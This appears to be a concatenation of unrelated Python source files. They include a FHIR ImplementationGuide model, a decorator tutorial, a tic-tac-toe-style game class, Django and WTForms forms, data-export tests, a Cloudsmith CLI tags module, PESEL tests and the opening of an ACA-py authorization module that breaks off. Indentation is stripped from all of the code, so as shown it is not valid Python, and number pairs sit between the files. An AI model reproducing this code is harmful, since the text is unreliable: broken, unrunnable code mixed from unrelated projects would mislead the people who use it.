"it must change if the status code changes. In addition, it should "
"change when the substantive content of the implementation guide "
"changes."
),
)
dependency: ListType[fhirtypes.ImplementationGuideDependencyType] = Field(
None,
alias="dependency",
title="Another Implementation guide this depends on",
description=(
"Another implementation guide that this implementation depends on. "
"Typically, an implementation guide uses value sets, profiles "
"etc.defined in other implementation guides."
),
)
description: fhirtypes.String = Field(
None,
alias="description",
title="Natural language description of the implementation guide",
description=(
"A free text natural language description of the implementation guide "
"from a consumer's perspective."
),
)
experimental: fhirtypes.Boolean = Field(
None,
alias="experimental",
title="For testing purposes, not real usage",
description=(
"A Boolean value to indicate that this implementation guide is authored"
" for testing purposes (or education/evaluation/marketing) and is not "
"intended to be used for genuine usage."
),
)
fhirVersion: fhirtypes.Id = Field(
None,
alias="fhirVersion",
title="FHIR Version this Implementation Guide targets",
description=(
"The version(s) of the FHIR specification that this ImplementationGuide"
" targets - e.g. describes how to use. The value of this element is the"
" formal version of the specification, without the revision number, "
"e.g. [publication].[major].[minor], which is 4.0.1. for this version."
),
)
global_fhir: ListType[fhirtypes.ImplementationGuideGlobalType] = Field(
None,
alias="global",
title="Profiles that apply globally",
description=(
"A set of profiles that all resources covered by this implementation "
"guide must conform to."
),
)
name: fhirtypes.String = Field(
...,
alias="name",
title="Name for this implementation guide (computer friendly)",
description=(
"A natural language name identifying the implementation guide. This "
"name should be usable as an identifier for the module by machine "
"processing applications such as code generation."
),
)
package: ListType[fhirtypes.ImplementationGuidePackageType] = Field(
...,
alias="package",
title="List of `ImplementationGuidePackage` items (represented as `dict` in JSON).",
description="Group of resources as used in .page.package.",
)
page: fhirtypes.ImplementationGuidePageType = Field(
...,
alias="page",
title="Type `ImplementationGuidePage` (represented as `dict` in JSON).",
description="Page/Section in the Guide.",
)
publisher: fhirtypes.String = Field(
None,
alias="publisher",
title="Name of the publisher (organization or individual)",
description=(
"The name of the organization or individual that published the "
"implementation guide."
),
)
status: fhirtypes.Code = Field(
...,
alias="status",
title="draft | active | retired",
description=(
"The status of this implementation guide. Enables tracking the life-"
"cycle of the content."
),
# note: Enum values can be used in validation,
# but use in your own responsibilities, read official FHIR documentation.
enum_values=["draft", "active", "retired"],
)
url: fhirtypes.Uri = Field(
...,
alias="url",
title=(
"Canonical identifier for this implementation guide, represented as a "
"URI (globally unique)"
),
description=(
"An absolute URI that is used to identify this implementation guide "
"when it is referenced in a specification, model, design or an "
"instance; also called its canonical identifier. This SHOULD be "
"globally unique and SHOULD be a literal address at which at which an "
"authoritative instance of this implementation guide is (or will be) "
"published. This URL can be the target of a canonical reference. It "
"SHALL remain the same when the implementation guide is stored on "
"different servers."
),
)
useContext: ListType[fhirtypes.CodeableConceptType] = Field(
None,
alias="useContext",
title="The context that the content is intended to support",
description=(
"The content was developed with a focus and intent of supporting the "
"contexts that are listed. These contexts may be general categories "
"(gender, age, ...) or may be references to specific programs "
"(insurance plans, studies, ...) and may be used to assist with "
"indexing and searching for appropriate implementation guide instances."
),
)
version: fhirtypes.String = Field(
None,
alias="version",
title="Business version of the implementation guide",
description=(
"The identifier that is used to identify this version of the "
"implementation guide when it is referenced in a specification, model, "
"design or instance. This is an arbitrary value managed by the "
"implementation guide author and is not expected to be globally unique."
" For example, it might be a timestamp (e.g. yyyymmdd) if a managed "
"version is not available. There is also no expectation that versions "
"can be placed in a lexicographical sequence."
),
)
class ImplementationGuideContact(backboneelement.BackboneElement):
"""Contact details of the publisher.
Contacts to assist a user in finding and communicating with the publisher.
"""
resource_type = Field("ImplementationGuideContact", const=True)
name: fhirtypes.String = Field(
None,
alias="name",
title="Type `str`.",
description="Name of a individual to contact.",
)
telecom: ListType[fhirtypes.ContactPointType] = Field(
None,
alias="telecom",
title="List of `ContactPoint` items (represented as `dict` in JSON).",
description="Contact details for individual or publisher.",
)
class ImplementationGuideDependency(backboneelement.BackboneElement):
"""Another Implementation guide this depends on.
Another implementation guide that this implementation depends on.
Typically, an implementation guide uses value sets, profiles etc.defined in
other implementation guides.
"""
resource_type = Field("ImplementationGuideDependsOn", const=True)
type: fhirtypes.Code = Field(
...,
alias="type",
title="Type `str`.",
description="reference | inclusion.",
# note: Enum values can be used in validation,
# but use in your own responsibilities, read official FHIR documentation.
enum_values=["reference", "inclusion"],
)
uri: fhirtypes.Uri = Field(
...,
alias="uri",
title="Identity of the IG that this depends on",
description="A canonical reference to the Implementation guide for the dependency.",
)
class ImplementationGuideGlobal(backboneelement.BackboneElement):
"""Profiles that apply globally.
A set of profiles that all resources covered by this implementation guide
must conform to.
"""
resource_type = Field("ImplementationGuideGlobal", const=True)
profile: fhirtypes.ReferenceType = Field(
...,
alias="profile",
title="Profile that all resources must conform to",
description="A reference to the profile that all instances must conform to.",
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["StructureDefinition"],
)
type: fhirtypes.Code = Field(
...,
alias="type",
title="Type this profile applies to",
description="The type of resource that all instances must conform to.",
)
class ImplementationGuidePackage(backboneelement.BackboneElement):
"""Group of resources as used in .page.package.
A logical group of resources. Logical groups can be used when building
pages.
"""
resource_type = Field("ImplementationGuidePackage", const=True)
description: fhirtypes.String = Field(
None,
alias="description",
title="Type `str`.",
description="Human readable text describing the package.",
)
name: fhirtypes.String = Field(
...,
alias="name",
title="Type `str`.",
description="Name used .page.package.",
)
resource: ListType[fhirtypes.ImplementationGuidePackageResourceType] = Field(
...,
alias="resource",
title=(
"List of `ImplementationGuidePackageResource` items (represented as `dict` "
"in JSON)."
),
description="Resource in the implementation guide.",
)
class ImplementationGuidePackageResource(backboneelement.BackboneElement):
"""Resource in the implementation guide.
A resource that is part of the implementation guide. Conformance resources
(value set, structure definition, conformance statements etc.) are obvious
candidates for inclusion, but any kind of resource can be included as an
example resource.
"""
resource_type = Field("ImplementationGuidePackageResource", const=True)
acronym: fhirtypes.String = Field(
None,
alias="acronym",
title="Type `str`.",
description="Short code to identify the resource.",
)
description: fhirtypes.String = Field(
None,
alias="description",
title="Type `str`.",
description="Reason why included in guide.",
)
exampleFor: fhirtypes.ReferenceType = Field(
None,
alias="exampleFor",
title=(
"Type `Reference` referencing `StructureDefinition` (represented as `dict` "
"in JSON)."
),
description="Resource this is an example of (if applicable).",
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["StructureDefinition"],
)
name: fhirtypes.String = Field(
None,
alias="name",
title="Type `str`.",
description="Human Name for the resource.",
)
purpose: fhirtypes.Code = Field(
...,
alias="purpose",
title="Type `str`.",
description=(
"example | terminology | profile | extension | dictionary | logical."
),
# note: Enum values can be used in validation,
# but use in your own responsibilities, read official FHIR documentation.
enum_values=[
"example",
"terminology",
"profile",
"extension",
"dictionary",
"logical",
],
)
sourceReference: fhirtypes.ReferenceType = Field(
None,
alias="sourceReference",
title="Type `Reference` referencing `Resource` (represented as `dict` in JSON).",
description="Location of the resource.",
# Choice of Data Types. i.e timing[x]
one_of_many="source",
one_of_many_required=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["Resource"],
)
sourceUri: fhirtypes.Uri = Field(
None,
alias="sourceUri",
title="Type `str`.",
description="Location of the resource.",
# Choice of Data Types. i.e timing[x]
one_of_many="source",
one_of_many_required=True,
)
@root_validator(pre=True)
def validate_one_of_many(cls, values: Dict[str, Any]) -> Dict[str, Any]:
"""https://www.hl7.org/fhir/formats.html#choice
A few elements have a choice of more than one data type for their content.
All such elements have a name that takes the form nnn[x].
The "nnn" part of the name is constant, and the "[x]" is replaced with
the title-cased name of the type that is actually used.
The table view shows each of these names explicitly.
Elements that have a choice of data type cannot repeat - they must have a
maximum cardinality of 1. When constructing an instance of an element with a
choice of types, the authoring system must create a single element with a
data type chosen from among the list of permitted data types.
"""
one_of_many_fields = {
"source": ["sourceReference", "sourceUri"],
}
for prefix, fields in one_of_many_fields.items():
assert cls.__fields__[fields[0]].field_info.extra["one_of_many"] == prefix
required = (
cls.__fields__[fields[0]].field_info.extra["one_of_many_required"]
is True
)
found = False
for field in fields:
if field in values and values[field] is not None:
if found is True:
raise ValueError(
"Any of one field value is expected from "
f"this list {fields}, but got multiple!"
)
else:
found = True
if required is True and found is False:
raise ValueError(f"Expect any of field value from this list {fields}.")
return values
class ImplementationGuidePage(backboneelement.BackboneElement):
"""Page/Section in the Guide.
A page / section in the implementation guide. The root page is the
implementation guide home page.
"""
resource_type = Field("ImplementationGuidePage", const=True)
format: fhirtypes.Code = Field(
None,
alias="format",
title="Type `str`.",
description="Format of the page (e.g. html, markdown, etc.).",
)
kind: fhirtypes.Code = Field(
...,
alias="kind",
title="Type `str`.",
description=(
"page | example | list | include | directory | dictionary | toc | resource."
),
# note: Enum values can be used in validation,
# but use in your own responsibilities, read official FHIR documentation.
enum_values=[
"page",
"example",
"list",
"include",
"directory",
"dictionary",
"toc",
"resource",
],
)
name: fhirtypes.String = Field(
...,
alias="name",
title="Type `str`.",
description="Short name shown for navigational assistance.",
)
package: ListType[fhirtypes.String] = Field(
None,
alias="package",
title="List of `str` items.",
description="Name of package to include.",
)
page: ListType[fhirtypes.ImplementationGuidePageType] = Field(
None,
alias="page",
title=(
"List of `ImplementationGuidePage` items (represented as `dict` in JSON)."
),
description="Nested Pages / Sections.",
)
source: fhirtypes.Uri = Field(
...,
alias="source",
title="Type `Uri`.",
description="Where to find that page.",
)
type: ListType[fhirtypes.Code] = Field(
None,
alias="type",
title="List of `Code` items.",
description="Kind of resource to include in the list.",
)
| 18,060 | 4,588 |
##-----------Non parametric decorator----------------
####initialization
##name = 'a'
##password = '1'
##user_status = False
##
####decorator
##def login(func):
## def inner():
## global name,password,user_status
## if user_status == True:
## pass
## else:
## n = input('name:')
## p = input('password:')
## if n == name and p == password:
## user_status = True
## if user_status:
## func()
## return inner
##
##@login
##def webpage1():
## print('webpage---1')
##@login
##def webpage2():
## print('webpage---2')
##
####webpage1 = login(webpage1)##original method1
####webpage2 = login(webpage2)##original method2
##webpage1()
##webpage2()
##-----------Non parametric decorator----------------
####-----------Parametric decorator--------------------
####initialization
##name = 'a'
##password = '1'
##user_status = False
##
####decorator
##def login(func):
## def inner(*args,**kwargs):##arbitrary parameters can be passed in
## global name,password,user_status
## if user_status == True:
## pass
## else:
## n = input('name:')
## p = input('password:')
## if n == name and p == password:
## user_status = True
## if user_status:
## func(*args,**kwargs)##arbitrary parameters can be passed in
## return inner
##
##@login
##def webpage1(arg):
## print('webpage---1',arg)
##@login
##def webpage2():
## print('webpage---2')
##
####webpage1 = login(webpage1)##original method1
####webpage2 = login(webpage2)##original method2
##webpage1('111')
##webpage2()
####-----------Parametric decorator--------------------
##-----------Multi-layer decorator--------------------
##initialization
name = 'a'
password = '1'
user_status = False
##decorator
def login(auth_type):
def outer(func):
def inner(*args,**kwargs):##arbitrary parameters can be passed in
global name,password,user_status
if auth_type == 'qq':
if user_status == True:
pass
else:
n = input('name:')
p = input('password:')
if n == name and p == password:
user_status = True
if user_status:
func(*args,**kwargs)##arbitrary parameters can be passed in
else:
print('auth_type is wrong!')
return inner
return outer
@login('qq')
def webpage1(arg):
print('webpage---1',arg)
@login('weixin')
def webpage2():
print('webpage---2')
##temp = login("qq")##original method1
##webpage1 = temp(webpage1)
webpage1('111')
##-----------Multi-layer decorator--------------------
| 2,796 | 814 |
import numpy as np
from game import Game
class MNKgame(Game):
"""
https://en.wikipedia.org/wiki/M,n,k-game
If m=3, n=3, k=3. This is TicTakToe and default
"""
def __init__(self, n=3, m=3, k=3, field=None):
self.n = n
self.m = m
self.k = k
self.field = field
if field is None:
self.field = np.zeros((n, m))
self.winner = 0
def evaluate(self, field) -> bool:
# down
for x in range(self.m):
score = self.scan(field, (1, 0), 0, x)
if score != 0:
return score
# right
for y in range(self.n):
score = self.scan(field, (0, 1), y, 0)
if score != 0:
return score
# right down
for x in range(self.m):
score = self.scan(field, (1, 1), 0, x)
if score != 0:
return score
for y in range(self.n):
score = self.scan(field, (1, 1), y, 0)
if score != 0:
return score
# right up
for x in range(self.n):
score = self.scan(field, (-1, 1), self.m, x)
if score != 0:
return score
for y in range(self.m):
score = self.scan(field, (-1, 1), y, 0)
if score != 0:
return score
return 0
def scan(self, field, d, i, j) -> bool:
cnt_player = 0
cnt_enemy = 0
while(self.is_in_field(i, j)):
if int(field[i][j]) == 1:
cnt_player += 1
if cnt_player == self.k:
return 1
elif int(field[i][j]) == -1:
cnt_enemy += 1
if cnt_enemy == self.k:
return -1
else:
cnt_player = 0
cnt_enemy = 0
i += d[0]
j += d[1]
return 0
def is_in_field(self, i, j):
if 0 <= i and i < self.n and 0 <= j and j < self.m:
return True
return False
def update(self, action, val):
self.field[action[0]][action[1]] = val
def get_actions(self, field):
indexes = np.where(field == 0)
if len(indexes[0]) == 0:
return []
return list(zip(indexes[0], indexes[1]))
| 2,325 | 778 |
from django import forms
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from .choices import *
from django.contrib.auth.forms import AuthenticationForm
from django.core.exceptions import ObjectDoesNotExist
from django.forms import ValidationError
# override basic authentication form to allow logging in with email or username
class EmailAuthenticationForm(AuthenticationForm):
def clean_username(self):
username = self.data['username']
if '@' in username:
try:
username = User.objects.get(email=username).username
except ObjectDoesNotExist:
raise ValidationError(
self.error_messages['invalid_login'],
code='invalid_login',
params={'username': self.username_field.verbose_name},
)
return username
# override basic user creation for to add required email field
class NewUserForm(UserCreationForm):
email = forms.EmailField(required=True)
class Meta:
model = User
fields = ("username", "email", "password1", "password2")
def save(self, commit=True):
user = super(NewUserForm, self).save(commit=False)
if commit:
user.save()
return user
# form for creating basic text note
class NoteForm(forms.Form):
title = forms.CharField(max_length=100)
content = forms.CharField(
widget=forms.Textarea(attrs={'width': "100%", 'cols': "80", 'rows': "20", 'height': '100%'}), required=False)
theme = forms.ChoiceField(choices=THEMES, label="Theme", initial='', widget=forms.Select(), required=True)
# form for creating list note
class NoteListForm(forms.Form):
title = forms.CharField(max_length=100)
content = forms.CharField(required=False, label="List items",
widget=forms.TextInput(attrs={'placeholder': 'Add item and press Enter'}))
theme = forms.ChoiceField(choices=THEMES, label="Theme", initial='', widget=forms.Select(), required=True)
# form for creating picture note
class NotePictureForm(forms.Form):
title = forms.CharField(max_length=100)
content = forms.CharField(
widget=forms.Textarea(attrs={'width': "100%", 'cols': "80", 'rows': "20", 'height': '100%'}), required=False)
picture = forms.ImageField()
# override picture note form to show actual picture path
class NotePictureFormUpdate(forms.Form):
title = forms.CharField(max_length=100)
content = forms.CharField(
widget=forms.Textarea(attrs={'width': "100%", 'cols': "80", 'rows': "20", 'height': '100%'}),
required=False)
picture = forms.ImageField(required=False)
| 2,721 | 764 |
from common import initialize_test_yml_list_measurement
from view import VIEW
import pathlib as pl
import shutil
from view.python_core.ctvs import get_all_available_ctvs
from view.python_core.gdm_generation.gdm_data_classes import GDMFile
class TraceExporter(object):
def __init__(self):
super().__init__()
test_yml, self.test_animal, self.test_measu = initialize_test_yml_list_measurement()
self.view = VIEW()
self.view.update_flags_from_ymlfile(test_yml)
def load_and_export(self, flags_to_update, file_suffix, flags_suffix):
self.view.update_flags(flags_to_update)
self.view.initialize_animal(self.test_animal)
roi_data_dict, roi_file = self.view.get_roi_info_for_current_animal()
# initialize and empty data frame to accumulate data
gdm_file = GDMFile()
# iterate over measurements of the animal
for measu in self.view.get_measus_for_current_animal(analyze_values_to_use=(1,)):
# load a measurement for the animal
self.view.load_measurement_data_from_current_animal(measu)
# calculate signals
self.view.calculate_signals()
# create glodatamix for the loaded measurement
gdm_file_this_measu, _ = self.view.get_gdm_file_for_current_measurement(roi_data_dict)
# accumulate
gdm_file.append_from_a_gdm_file(gdm_file_this_measu)
# compose output file name
output_file = self.view.flags.get_gloDatamix_file_for_current_animal()
output_file_path = pl.Path(output_file)
test_gdm_folder =\
pl.Path(self.view.flags["STG_OdorReportPath"]) / "test_gdms" / \
f"{output_file_path.stem}{file_suffix}"
if not test_gdm_folder.is_dir():
test_gdm_folder.mkdir(parents=True)
test_output_file = test_gdm_folder / f"gdm{flags_suffix}{output_file_path.suffix}"
# save gloDatamix file
gdm_file.write_to_csv(test_output_file)
def test_export_traces_rois():
"""
Testing exporting traces using .roi files
"""
exporter = TraceExporter()
coor_path = pl.Path(exporter.view.flags["STG_OdormaskPath"])
dest_roi_file = coor_path / "Fake_data.roi"
for fle in coor_path.iterdir():
if fle.name.startswith("FakeData") and fle.suffix == ".roi":
shutil.copy(str(fle), str(dest_roi_file))
exporter.load_and_export(
flags_to_update={"RM_ROITrace": 3},
file_suffix=f"_from_roi{fle.stem.lstrip('FakeData')}",
flags_suffix="_defaults"
)
dest_roi_file.unlink()
def test_export_traces_mask_tif():
"""
Testing exporting traces using .roi.tif files
"""
exporter = TraceExporter()
exporter.load_and_export(
flags_to_update={"RM_ROITrace": 4},
file_suffix="_from_roi_tif",
flags_suffix="_defaults"
)
def test_export_traces_different_ctvs():
"""
Testing exporting traces with different CTVs
"""
exporter = TraceExporter()
for ctv in get_all_available_ctvs():
exporter.load_and_export(
flags_to_update={"RM_ROITrace": 3, "CTV_Method": ctv},
file_suffix=f"_from_roi",
flags_suffix=f"_ctv{ctv}"
)
def test_export_traces_within_ROI():
"""
Testing exporting traces considering the area file
"""
exporter = TraceExporter()
exporter.load_and_export(
flags_to_update={"RM_ROITrace": 3, "GDM_withinArea": True},
file_suffix="_from_roi",
flags_suffix="_withinArea_True"
)
def test_export_traces_chunks_only():
"""
Testing exporting traces considering the area file
"""
exporter = TraceExporter()
exporter.load_and_export(
flags_to_update=
{
"RM_ROITrace": 3,
"GDM_outputType": "chunks_only",
"GDM_chunkPostStim": 2, # in seconds
"GDM_chunkPreStim": 2, # in seconds
},
file_suffix="_chunks_only",
flags_suffix="_2secPrePostStim"
)
exporter.load_and_export(
flags_to_update=
{
"RM_ROITrace": 3,
"GDM_outputType": "chunks_only",
"GDM_chunkPostStim": 100, # in seconds
"GDM_chunkPreStim": 100, # in seconds
},
file_suffix="_chunks_only",
flags_suffix="_full"
)
if __name__ == '__main__':
test_export_traces_rois()
# test_export_traces_mask_tif()
# test_export_traces_within_ROI()
test_export_traces_chunks_only() | 4,617 | 1,647 |
from wtforms import Form, StringField, TextAreaField,SelectField, FileField,HiddenField
from wtforms.validators import DataRequired, Optional, Email, URL, Length
from models import Entry, Tag
class TagField(StringField):
def _value(self):
if self.data:
#Display tags as a comma-separated list.
return ', '.join([tag.name for tag in self.data])
return ''
def get_tags_from_string(self, tag_string):
raw_tags = tag_string.split(',')
#Filter out any empty tag
tag_names = [name.strip() for name in raw_tags if name.strip()]
#Query the database and retrieve any tags we have already saved
existing_tags = Tag.query.filter(Tag.name.in_(tag_names))
#Determine which tag names are new.
new_names = set(tag_names) - set([tag.name for tag in existing_tags])
#Create a list of unsaved Tag instances for the new tags
new_tags = [Tag(name=name) for name in new_names]
#Return all the existing tags + all new, unsaved tags
return list(existing_tags)+new_tags
def process_formdata(self, valuelist):
if valuelist:
self.data = self.get_tags_from_string(valuelist[0])
else:
self.data = []
class ImageForm(Form):
file = FileField('Image File')
class EntryForm(Form):
title = StringField('Title', validators=[DataRequired()])
body = TextAreaField('Body', validators=[DataRequired()])
status = SelectField(
'Entry Status',
choices=(
(Entry.STATUS_PUBLIC,'Public'),
(Entry.STATUS_DRAFT,'Draft')),
coerce=int
)
tags = TagField(
'Tag',
description='Separate multiple tags with commas.'
)
def save_entry(self, entry):
self.populate_obj(entry)
entry.generate_slug()
return entry
class CommentForm(Form):
name = StringField('Name',validators=[DataRequired()])
email = StringField('Email',validators=[DataRequired(),Email()])
url = StringField('Url', validators=[Optional(), URL()])
body = TextAreaField('Comment', validators=[DataRequired(),Length(min=10, max=3000)])
entry_id = HiddenField(validators=[DataRequired()])
def validate(self):
if not super(CommentForm, self).validate():
return False
entry = Entry.query.filter(
(Entry.status == Entry.STATUS_PUBLIC),
(Entry.id == self.entry_id.data)
).first()
if not entry:
return False
return True | 2,551 | 741 |
# -*- coding: utf-8 -*-
"""CLI/Commands - List objects."""
from __future__ import absolute_import, print_function, unicode_literals
from operator import itemgetter
import click
from ...core.api.packages import (
get_package_tags as api_get_package_tags,
tag_package as api_tag_package,
)
from .. import command, decorators, utils, validators
from ..exceptions import handle_api_exceptions
from ..utils import maybe_spinner
from .main import main
def _parse_tags(tags):
"""Parse tags from CSV into a list."""
return [x.strip() for x in (tags or "").split(",")]
def _print_tags(opts, all_tags, all_immutable_tags):
"""Print the tags for a package."""
all_combined_tags = {"tags": all_tags, "tags_immutable": all_immutable_tags}
if utils.maybe_print_as_json(opts, all_combined_tags):
return
headers = ["Tag", "Type", "Immutable"]
rows = []
for tag_type, tags in sorted(all_tags.items(), key=itemgetter(0)):
immutable_tags = all_immutable_tags.get(tag_type) or []
for tag in sorted(tags):
immutable = "Yes" if tag in immutable_tags else "No"
rows.append(
[
click.style(tag, fg="cyan"),
click.style(tag_type, fg="yellow"),
click.style(immutable, fg="magenta"),
]
)
if all_tags:
click.echo()
utils.pretty_print_table(headers, rows)
click.echo()
num_results = len(rows)
list_suffix = "tag%s" % ("s" if num_results != 1 else "")
utils.pretty_print_list_info(num_results=num_results, suffix=list_suffix)
@main.group(name="tags", cls=command.AliasGroup, aliases=["tag"])
@decorators.common_cli_config_options
@decorators.common_cli_output_options
@decorators.common_api_auth_options
@decorators.initialise_api
@click.pass_context
def tags_(ctx, opts): # pylint: disable=unused-argument
"""
Manage the tags for a package in a repository.
See the help for subcommands for more information on each.
"""
@tags_.command(name="list", aliases=["ls"])
@decorators.common_cli_config_options
@decorators.common_cli_output_options
@decorators.common_api_auth_options
@decorators.initialise_api
@click.argument(
"owner_repo_package",
metavar="OWNER/REPO/PACKAGE",
callback=validators.validate_owner_repo_package,
)
@click.pass_context
def list_tags(ctx, opts, owner_repo_package):
"""
List tags for a package in a repository.
This requires appropriate (read) permissions for the package.
- OWNER/REPO/PACKAGE: Specify the OWNER namespace (i.e. user or org), the
REPO name where the package is stored, and the PACKAGE identifier of the
package itself. All separated by a slash.
Example: 'your-org/awesome-repo/better-pkg'.
Full CLI example:
$ cloudsmith tags list your-org/awesome-repo/better-pkg
"""
owner, repo, package = owner_repo_package
click.echo(
"Listing tags for the '%(package)s' package ... "
% {"package": click.style(package, bold=True)},
nl=False,
)
context_msg = "Failed to list tags for the package!"
with handle_api_exceptions(ctx, opts=opts, context_msg=context_msg):
with maybe_spinner(opts):
package_tags, package_tags_immutable = api_get_package_tags(
owner=owner, repo=repo, identifier=package
)
click.secho("OK", fg="green")
_print_tags(opts, package_tags, package_tags_immutable)
@tags_.command(name="add")
@decorators.common_cli_config_options
@decorators.common_cli_output_options
@decorators.common_api_auth_options
@decorators.initialise_api
@click.argument(
"owner_repo_package",
metavar="OWNER/REPO/PACKAGE",
callback=validators.validate_owner_repo_package,
)
@click.argument("tags", metavar="TAGS")
@click.option(
"--immutable",
default=False,
is_flag=True,
help=(
"If true, the tags created will be immutable (cannot be changed). In "
"practice, this means the tags cannot be (easily) deleted. A repository "
"admin can explicitly remove immutable tags."
),
)
@click.pass_context
def add_tags(ctx, opts, owner_repo_package, tags, immutable):
"""
Add tags to a package in a repository.
This requires appropriate (write) permissions for the package.
- OWNER/REPO/PACKAGE: Specify the OWNER namespace (i.e. user or org), the
REPO name where the package is stored, and the PACKAGE identifier of the
package itself. All separated by a slash.
Example: 'your-org/awesome-repo/better-pkg'.
- TAGS: A comma-separated value list of the tags you want to add.
Example: foo,bar
Full CLI example:
$ cloudsmith tags add your-org/awesome-repo/better-pkg foo,bar
"""
owner, repo, package = owner_repo_package
tags = _parse_tags(tags)
click.echo(
"Adding '%(tags)s' tag%(s)s to the '%(package)s' package ... "
% {
"package": click.style(package, bold=True),
"tags": click.style(", ".join(tags or [])),
"s": "s" if len(tags) != 1 else "",
},
nl=False,
)
context_msg = "Failed to add tags to package!"
with handle_api_exceptions(ctx, opts=opts, context_msg=context_msg):
with maybe_spinner(opts):
package_tags, package_tags_immutable = api_tag_package(
owner=owner,
repo=repo,
identifier=package,
data={"action": "add", "tags": tags, "is_immutable": immutable},
)
click.secho("OK", fg="green")
_print_tags(opts, package_tags, package_tags_immutable)
@tags_.command(name="clear")
@decorators.common_cli_config_options
@decorators.common_cli_output_options
@decorators.common_api_auth_options
@decorators.initialise_api
@click.argument(
"owner_repo_package",
metavar="OWNER/REPO/PACKAGE",
callback=validators.validate_owner_repo_package,
)
@click.pass_context
def clear_tags(ctx, opts, owner_repo_package):
"""
Clear all existing (non-immutable) tags from a package in a repository.
This requires appropriate (write) permissions for the package.
- OWNER/REPO/PACKAGE: Specify the OWNER namespace (i.e. user or org), the
REPO name where the package is stored, and the PACKAGE identifier of the
package itself. All separated by a slash.
Example: 'your-org/awesome-repo/better-pkg'.
Full CLI example:
$ cloudsmith tags clear your-org/awesome-repo/better-pkg
"""
owner, repo, package = owner_repo_package
click.echo(
"Clearing tags on the '%(package)s' package ... "
% {"package": click.style(package, bold=True)},
nl=False,
)
context_msg = "Failed to clear tags on package!"
with handle_api_exceptions(ctx, opts=opts, context_msg=context_msg):
with maybe_spinner(opts):
package_tags, package_tags_immutable = api_tag_package(
owner=owner, repo=repo, identifier=package, data={"action": "clear"}
)
click.secho("OK", fg="green")
_print_tags(opts, package_tags, package_tags_immutable)
@tags_.command(name="remove", aliases=["rm"])
@decorators.common_cli_config_options
@decorators.common_cli_output_options
@decorators.common_api_auth_options
@decorators.initialise_api
@click.argument(
"owner_repo_package",
metavar="OWNER/REPO/PACKAGE",
callback=validators.validate_owner_repo_package,
)
@click.argument("tags", metavar="TAGS")
@click.pass_context
def remove_tags(ctx, opts, owner_repo_package, tags):
"""
Remove tags from a package in a repository.
This requires appropriate (write) permissions for the package.
- OWNER/REPO/PACKAGE: Specify the OWNER namespace (i.e. user or org), the
REPO name where the package is stored, and the PACKAGE identifier of the
package itself. All separated by a slash.
Example: 'your-org/awesome-repo/better-pkg'.
- TAGS: A comma-separated value list of the tags you want to remove.
Example: foo,bar
Full CLI example:
$ cloudsmith tags remove your-org/awesome-repo/better-pkg foo,bar
"""
owner, repo, package = owner_repo_package
tags = _parse_tags(tags)
click.echo(
"Removing '%(tags)s' tag%(s)s to the '%(package)s' package ... "
% {
"package": click.style(package, bold=True),
"tags": click.style(", ".join(tags or [])),
"s": "s" if len(tags) != 1 else "",
},
nl=False,
)
context_msg = "Failed to remove tags from package!"
with handle_api_exceptions(ctx, opts=opts, context_msg=context_msg):
with maybe_spinner(opts):
package_tags, package_tags_immutable = api_tag_package(
owner=owner,
repo=repo,
identifier=package,
data={"action": "remove", "tags": tags},
)
click.secho("OK", fg="green")
_print_tags(opts, package_tags, package_tags_immutable)
@tags_.command(name="replace")
@decorators.common_cli_config_options
@decorators.common_cli_output_options
@decorators.common_api_auth_options
@decorators.initialise_api
@click.argument(
"owner_repo_package",
metavar="OWNER/REPO/PACKAGE",
callback=validators.validate_owner_repo_package,
)
@click.argument("tags", metavar="TAGS")
@click.option(
"--immutable",
default=False,
is_flag=True,
help=(
"If true, the tags created will be immutable (cannot be changed). In "
"practice, this means the tags cannot be (easily) deleted. A repository "
"admin can explicitly remove immutable tags."
),
)
@click.pass_context
def replace_tags(ctx, opts, owner_repo_package, tags, immutable):
"""
Replace all existing (non-immutable) tags on a package in a repository.
This requires appropriate (write) permissions for the package.
- OWNER/REPO/PACKAGE: Specify the OWNER namespace (i.e. user or org), the
REPO name where the package is stored, and the PACKAGE identifier of the
package itself. All separated by a slash.
Example: 'your-org/awesome-repo/better-pkg'.
- TAGS: A comma-separated value list of the tags you want to replace existing with.
Example: foo,bar
Full CLI example:
$ cloudsmith tags replace your-org/awesome-repo/better-pkg foo,bar
"""
owner, repo, package = owner_repo_package
tags = _parse_tags(tags)
click.echo(
"Replacing existing with '%(tags)s' tag%(s)s on the '%(package)s' package ... "
% {
"package": click.style(package, bold=True),
"tags": click.style(", ".join(tags or [])),
"s": "s" if len(tags) != 1 else "",
},
nl=False,
)
context_msg = "Failed to replace tags on package!"
with handle_api_exceptions(ctx, opts=opts, context_msg=context_msg):
with maybe_spinner(opts):
package_tags, package_tags_immutable = api_tag_package(
owner=owner,
repo=repo,
identifier=package,
data={"action": "replace", "tags": tags, "is_immutable": immutable},
)
click.secho("OK", fg="green")
_print_tags(opts, package_tags, package_tags_immutable)
| 11,323 | 3,583 |
from pesel import Pesel
import pytest
@pytest.fixture(scope='session', params=["65432101239"])
def pesel_value(request):
return request.param
@pytest.fixture(scope='session')
def pesel_obj(pesel_value):
return Pesel(pesel_value)
def test_correct_pesel(pesel_obj, pesel_value):
pytest.assume(pesel_obj.value == pesel_value)
def test_correct_pesel_gender(pesel_obj):
pytest.assume(pesel_obj.gender == 'male')
def test_correct_pesel_male(pesel_obj):
pytest.assume(pesel_obj.male is True)
def test_correct_pesel_year(pesel_obj):
pytest.assume(pesel_obj.year == 2165)
def test_correct_pesel_month(pesel_obj):
pytest.assume(pesel_obj.month == 3)
def test_incorrect_pesel_day(pesel_obj):
pytest.assume(pesel_obj.day == 21)
| 764 | 320 |
from aca.client import ACAClient
from aries_cloudcontroller.aries_controller import AriesAgentController
from asgiref.sync import sync_to_async, async_to_sync
from django.utils import timezone
from datetime import timedelta
from aca.models import PresentationFactory
from oidc.utils.shortener import create_short_url
from oidc.models import AuthSession, PresentationConfigurations, MappedUrl
from django.conf import settings
from datetime import datetime, timedelta
import asyncio
WEBHOOK_HOST = "https://8b1dec9d51dd.ngrok.io"
WEBHOOK_PORT = 443
WEBHOOK_BASE = "https://8b1dec9d51dd.ngrok.io/webhooks/"
def authorization(pres_req_conf_id: str, request_parameters: dict):
aca_client = ACAClient(settings.ACA_PY_URL, settings.ACA_PY_TRANSPORT_URL)
presentation_configuration = PresentationConfigurations.objects.get(
id=pres_req_conf_id
)
